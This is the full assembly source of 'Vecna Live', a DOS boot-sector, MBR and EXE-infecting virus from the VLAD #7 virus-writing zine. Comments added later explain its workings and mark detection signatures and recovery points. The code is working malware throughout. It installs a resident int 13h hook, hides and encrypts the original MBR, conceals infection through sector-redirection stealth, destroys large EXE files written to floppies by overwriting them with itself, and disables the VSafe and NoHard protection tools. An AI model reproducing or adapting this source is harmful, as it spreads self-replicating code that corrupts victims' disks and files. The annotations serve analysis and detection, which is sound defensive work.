VLAD #7 - Vecna Boot Virus


;  " Seldom is the name Vecna spoken, and even then only in the most hushed
;    and terrified tones, for legends say the shade of this most supreme 
;    of all liches still roams the world."
;
; [Vecna Live] by Vecna
;
; Resident Boot/MBR/EXE infector
; Advanced Stealth
; Encrypt Boot/MBR
; Retro functions
; Does other stuff

; Toolchain/syntax: MASM/TASM, Intel operand order, 16-bit real mode.
; Layout: `org 0`, so every label offset equals the byte offset inside the
; 512-byte sector image. The same image is also executed as a .COM (loaded at
; cs:100h), which is why the InCom path adds 100h to every memory reference.
.model  tiny
.code
org     0

; Infection marker tested against word [bx+offset marker] of every boot
; sector the code touches. `marker` (below) coincides with the first two
; encoded bytes of msg2, so on disk the marker reads 75h 03h
; (' ' XOR 55h, 'V' XOR 55h); 'V ' XOR 5555h evaluates to that same word.
; This fixed word at a fixed sector offset is a usable detection signature.
MARK = 'V ' XOR 05555h

;-----------------------------------------------------------------------
; Entry point. One image, two execution contexts:
;  * loaded by the BIOS at 0:7C00h as a boot sector / MBR  -> InBoot
;  * loaded by DOS as a .COM (dropped over an EXE's first sector, see
;    IsExe) with a PSP at cs:0                             -> InCom
; The PSP test below distinguishes them: a PSP begins with `int 20h`
; (bytes CDh 20h), a BIOS-loaded sector begins with this `cli`.
;-----------------------------------------------------------------------
Start:  cli
	jmp     short begin

; 31 reserved bytes at sector offsets 3..21h. Write_V copies the same
; range out of the original sector into here before the image is written,
; so an infected floppy keeps a parseable BPB. The InCom path writes the
; image without filling this area.
bootif: db      1fh dup (?)                             ; Old BPB

begin:  cmp     cs:[0], 20cdh                           ; Check PSP
	jnz     InBoot

;-----------------------------------------------------------------------
; .COM context (cs:100h = Start; all operands carry +100h).
; Self-modifying check: the displacement byte of the `jmp short conti` at
; `loco` is overwritten with 0 (a jump to the next instruction). Per the
; author's comments this is meant as a prefetch-queue / debugger /
; emulator probe: if the already-fetched original jmp executes, the block
; below is skipped; if the patched byte takes effect, execution falls
; through, prints the msg2 banner and stalls before continuing at conti.
;-----------------------------------------------------------------------
InCom:  sti                                             ; TBClean active?
	push    word ptr [loco+100h]                    ; Debug active? (save the original jmp word)
	mov     byte ptr [loco+100h+1], 0h              ; Pentium? (patch displacement to 0)
loco:   jmp     short conti                             ; No, continue
	mov     si, offset Msg2+100h
	mov     cx, EndMsg2-Msg2
	mov     byte ptr[_ret+100h], 0c3h               ; Patch _ret to `ret` so Decrypt returns instead of exiting via int 21h
	xor     ax, ax
	db      2eh                                     ; CS-prefix byte in front of int 10h
	int     10h                                     ; ah=0: set video mode (al=0)
	call    Decrypt                                 ; Print warning
twast:  loop    twast                                   ; Wast time (cx is 0 after Decrypt, so this spins 65536 times)

;-----------------------------------------------------------------------
; Main .COM path: disable two period resident protection tools, probe for
; an already-resident copy, then infect the first hard disk's MBR.
; On the `db 2eh` lines: 2Eh is a CS segment-override prefix. The CPU
; ignores it on `int`, so the call behaves normally, but the byte sequence
; is no longer a bare CDh xx — signatures for this code should match the
; prefixed form (2Eh CDh xx) as well.
;-----------------------------------------------------------------------
conti:  pop     word ptr [loco+100h]                    ; Restore
	mov     byte ptr[_ret+100h], 2eh                ; Restore the prefix so Decrypt ends in int 21h/4Ch again
	mov     ah, 0ffh                                ; Uninstall NoHard
	xor     bl, bl
	db      2eh                                     ; Anti-TBClean
	int     13h
	mov     ax, 0fa02h                              ; Uninstall VSafe
	mov     dx, 5945h
	int     16h
; Residency probe: the resident Handler answers int 13h/ah=19h with ah=F0h
; (see ResTest). Detection note: an int 13h call with ah=19h that comes
; back with ah=F0h indicates the hook is installed on this machine.
	mov     ah, 019h                                ; Res check
	int     13h
	cmp     ah, 0f0h
	je      GoOut
; MBR infection (drive 80h). Buffer is the first byte after the image.
	mov     ax, 0201h                               ; Read MBR
	mov     bx, offset EndVir+100h
	mov     cl, 01h                                 ; sector 1 (ch is not set here; it is inherited)
	push    cx
	mov     dx, 0080h                               ; head 0, first hard disk
	int     13h
	cmp     word ptr es:[bx+offset marker],MARK     ; Is infected?
	je      GoOut
	call    EncDec                                  ; Encrypt MBR
	mov     ax, 0301h
	push    ax
	mov     cl, 05h
	int     13h                                     ; Write to sector 5
; Recovery note: the original MBR now sits, EncDec-encoded, in head 0,
; sector 5 of drive 80h. The image written to sector 1 below (cs:100h,
; 512 bytes) contains no copy of the original partition table, so the
; table is only visible while the resident Handler redirects reads.
	pop     ax
	pop     cx
	mov     bx, 0100h
	int     13h                                     ; Write virus
GoOut:  mov     si, offset Msg+100h
	mov     cx, EndMsg-Msg                          ; Print fake msg

; Fall-through from GoOut. Prints cx bytes from ds:si, each XOR 55h, via
; int 29h (DOS fast console output), then terminates the process with
; int 21h/ah=4Ch. When InCom has patched _ret to C3h, the tail is a `ret`
; instead and the routine returns to its caller.
Decrypt:lodsb
	xor     al, 055h
	db      2eh                                     ; Anti-TBClean
	int     29h
	loop    Decrypt
	mov     ah, 4ch                                 ; DOS terminate process (al = exit code)
_ret:   db      2eh                                     ; Anti-TBClean (patched to C3h by InCom)
	int     21h

;-----------------------------------------------------------------------
; Boot context: BIOS loaded this sector at 0:7C00h.
; Sets ss:sp = 0:7C00h, ds = 0, copies the 512-byte image to the top of
; conventional memory (after hiding 1 KB of it), hooks int 13h, and
; restarts the bootstrap so the real boot sector loads through the hook.
; Forensic indicators left behind: the word at 0040:0013 (and int 12h)
; reports 1 KB less than installed, and the int 13h vector at 0:4Ch
; points into that hidden top kilobyte.
;-----------------------------------------------------------------------
InBoot: mov     si,7c00h
	xor     ax,ax
	mov     es,ax
	mov     cl,6
	mov     ss,ax                                   ; Setup stack
	mov     sp,si
	sti
	mov     ds,ax
	dec     word ptr ds:[413h]                      ; Steal 1024 bytes (BIOS data area 0040:0013, base memory in KB)
	int     12h                                     ; ax = KB now reported
	shl     ax,cl                                   ; KB * 64 = paragraph address of the hidden KB
	xor     di,di
	mov     cx,100h                                 ; 100h words = 512 bytes
	mov     es,ax
	rep     movsw                                   ; Copy to high mem
	mov     ax,word ptr ds:[13h*4]                  ; save original int 13h vector into the high copy's i13
	mov     word ptr es:[offset i13],ax
	mov     ax,word ptr ds:[13h*4+2]
	mov     word ptr es:[offset i13+2],ax
	mov     word ptr ds:[13h*4],offset handler     ; Hook int 13h
	mov     word ptr ds:[13h*4+2],es
	int     19h                                    ; Reboot (bootstrap re-reads sector 1 through the hook; Stealth returns the original)

;-----------------------------------------------------------------------
; Reached from GoInf when the sector just read already carries MARK.
; Overwrites the caller's buffer (es:bx, unchanged since Handler entry)
; with the stored original sector and decodes it in place:
;   hard disk (dl >= 80h): cylinder 0, head 0, sector 5
;   floppy    (dl <  80h): cylinder 0, head 1, sector 14
; Exits through Pop_Exit, so the caller never sees the infected sector.
;-----------------------------------------------------------------------
Stealth:mov     cx,5                                   ; Show sector 5
	mov     ax,201h
	cmp     dl,80h
	jae     st_hd
	mov     cl,14                                  ; Or sector 14 head 1
	mov     dh,1                                   ; in floppies
st_hd:  call    int13h
	call    EncDec                                 ; Decrypt
	jmp     short pop_exit

;-----------------------------------------------------------------------
; Resident int 13h hook (0:4Ch points here, inside the hidden top KB).
;   ah = 19h                      -> ResTest: reply ah=F0h (residency probe)
;   ah in {2,3}, cx = 1, dh = 0   -> boot-sector read/write: let the BIOS
;                                    do it, then GoInf (infect or stealth)
;   anything else                 -> OtherStealth
; On a failed boot-sector request (carry set) the call is re-issued by
; jumping to the original handler through a13h.
;-----------------------------------------------------------------------
Handler:cmp     ah, 019h                               ; Res check?
	je      ResTest
	cmp     ah,2                                   ; Reading?
	jb      OtherStealth
	cmp     ah,3                                   ; Writing?
	ja      OtherStealth
	cmp     cx,1                                   ; In boot sector?
	jne     OtherStealth
	cmp     dh,0
	jne     OtherStealth
	call    int13h
	jnc     GoInf                                  ; Try infect
	jmp     a13h
ResTest:mov     ah, 0f0h                               ; "I am resident" answer
	iret

;-----------------------------------------------------------------------
; After a successful boot-sector read/write. es:bx = caller's buffer
; holding the sector. Saves all registers (restored in Pop_Exit), then:
;  already marked  -> Stealth
;  otherwise       -> store the encoded original sector (hard disk: C0/H0/S5,
;                     floppy: C0/H1/S14), copy its bytes 3..21h into bootif,
;                     and write the resident image (cs:0, 512 bytes) over
;                     sector 1 of the same drive.
; Recovery note: nothing copies the partition table of an MBR into the
; image; it survives only inside the stored sector-5 copy.
;-----------------------------------------------------------------------
GoInf:  pushf
	push    ax
	push    bx
	push    cx
	push    dx
	push    si
	push    di
	push    es
	push    ds
	cmp     word ptr es:[bx + offset marker],MARK  ; Already infect
	je      stealth
	cmp     dl,80h
	jb      inf_fl
	mov     cx,5                                   ; hard disk: cylinder 0, sector 5
	xor     dh,dh                                  ; head 0
	jmp     short write_v
Inf_fl: mov     cl,14                                  ; floppy: cylinder 0, sector 14
	mov     dh,1                                   ; head 1
Write_V:call    EncDec                                 ; encode the caller's buffer in place
	mov     ax,301h
	call    int13h                                 ; Write encrypted Boot
	call    EncDec                                 ; decode again so the caller's buffer is unchanged
	jc      pop_exit
	push    es                                     ; ds:si = original sector + 3
	pop     ds
	push    cs                                     ; es:di = bootif in the resident image
	pop     es
	mov     si, bx
	add     si, 3
	mov     di, offset bootif
	mov     cx, 1fh
	rep     movsb                                  ; Copy BPB
	push    cs
	push    cs
	pop     es
	pop     ds
	xor     bx, bx                                 ; es:bx = cs:0, the image itself
	mov     ax,301h
	mov     cx,1                                   ; sector 1
	xor     dh,dh                                  ; head 0 (dl = caller's drive)
	call    int13h

; Common exit for Handler paths that built the GoInf register frame.
; `retf 2` returns to the int 13h caller and drops the flags word pushed
; by INT; the flags popped just before (saved at GoInf after the BIOS
; call) become the caller's result flags.
Pop_Exit:pop     ds
	pop     es
	pop     di
	pop     si
	pop     dx
	pop     cx
	pop     bx
	pop     ax
	popf
	retf    2

;-----------------------------------------------------------------------
; Requests that are not boot-sector reads/writes.
; 1) Hard-disk access to cylinder 0, head 0, sector 5 (where the encoded
;    original MBR is stored) is redirected to sector 11, so the stored
;    copy cannot be read back through int 13h while the hook is active.
; 2) ah=3 (write) to a floppy, buffer starting with an EXE header of more
;    than 80h pages: the first 512 bytes of the file being written are
;    replaced by the image. The original header is not saved anywhere,
;    so the EXE is destroyed; when run, DOS loads it as a .COM and the
;    InCom path executes.
;-----------------------------------------------------------------------
OtherStealth:
	cmp     cx,5                                   ; In sector 5?
	jne     IsExe
	cmp     dh,0                                   ; In head 0?
	jne     IsExe
	cmp     dl,80h                                 ; In hd?
	jb      IsExe
	mov     cx, 0bh                                ; To sector 11
	jmp     short a13h

IsExe:  cmp     ah, 03h
	jne     a13h                                   ; Writing?
	push    ax
	mov     ax, word ptr es:[bx]
	add     al, ah                                 ; 'M'+'Z' = 4Dh+5Ah = 0A7h = 167 ('MZ' and 'ZM', or any pair summing to it)
	cmp     al, 167                                ; EXE file?
	pop     ax
	jne     a13h
	cmp     word ptr es:[bx+4], 080h               ; Big enough? (MZ e_cp: 512-byte pages in file, > 80h)
	jbe     a13h
	cmp     dl,80h                                 ; In floppy?
	jae     a13h
	push    ds
	push    cx
	push    di
	push    si
	push    cs                                     ; ds:si = cs:0, the image
	pop     ds
	xor     si, si
	mov     di, bx                                 ; es:di = caller's write buffer
	mov     cx, 200h
	rep     movsb                                  ; Overwrite with
	pop     si                                     ; virus code
	pop     di
	pop     cx
	pop     ds

; Far jump to the original int 13h handler: EAh followed by the saved
; vector (filled in by InBoot). Register state is passed through as-is.
a13h:   db      0eah
	i13     dd 0

; Invokes the original BIOS int 13h (vector saved in i13) the way INT
; would: pushf supplies the flags word that the handler's iret pops.
; Returns with the BIOS result (carry, ah, data in es:bx) intact.
Int13h: pushf
	call    dword ptr cs:[i13]
	ret

; Symmetric XOR transform of the 512 bytes at es:bx. Byte i is XORed with
; the low byte of the descending counter cx (200h, 1FFh, ..., 1), i.e.
; (200h - i) AND 0FFh; bytes 0 and 100h are therefore left unchanged.
; Applying it twice restores the data, so the same routine encodes before
; a write and decodes after a read. Preserves bx and cx; clobbers flags.
EncDec: push   bx                                       ; Encrypt/Decrypt boot
	push   cx
	mov    cx, 200h
EncLoop:xor    byte ptr es:[bx], cl
	inc    bx
	loop   EncLoop
	pop    cx
	pop    bx
	ret

; Message bytes are stored XOR 55h and decoded by Decrypt at print time.
; Msg decodes to "Out of memory." followed by LF, CR.
Msg     db      'O' XOR 055h                            ; Fake message
	db      'u' XOR 055h
	db      't' XOR 055h
	db      ' ' XOR 055h
	db      'o' XOR 055h
	db      'f' XOR 055h
	db      ' ' XOR 055h
	db      'm' XOR 055h
	db      'e' XOR 055h
	db      'm' XOR 055h
	db      'o' XOR 055h
	db      'r' XOR 055h
	db      'y' XOR 055h
	db      '.' XOR 055h
	db      10  XOR 055h
	db      13  XOR 055h
endmsg:

; Infection marker: same offset as msg2, so the marker word on disk is
; 75h 03h — the first two stored bytes below — which equals MARK.
Marker:

; msg2 decodes to " Vecna Live ..." followed by LF, CR, BEL.
msg2:   db      ' ' XOR 055h                            ; Warning...
	db      'V' XOR 055h
	db      'e' XOR 055h
	db      'c' XOR 055h
	db      'n' XOR 055h
	db      'a' XOR 055h
	db      ' ' XOR 055h
	db      'L' XOR 055h
	db      'i' XOR 055h
	db      'v' XOR 055h
	db      'e' XOR 055h
	db      ' ' XOR 055h
	db      '.' XOR 055h
	db      '.' XOR 055h
	db      '.' XOR 055h
	db      10  XOR 055h
	db      13  XOR 055h
	db      07  XOR 055h
endmsg2:

; Boot signature at sector offset 1FEh so the BIOS accepts the sector.
org     510
	db      055h,0aah                               ; Valid MBR

EndVir:

end
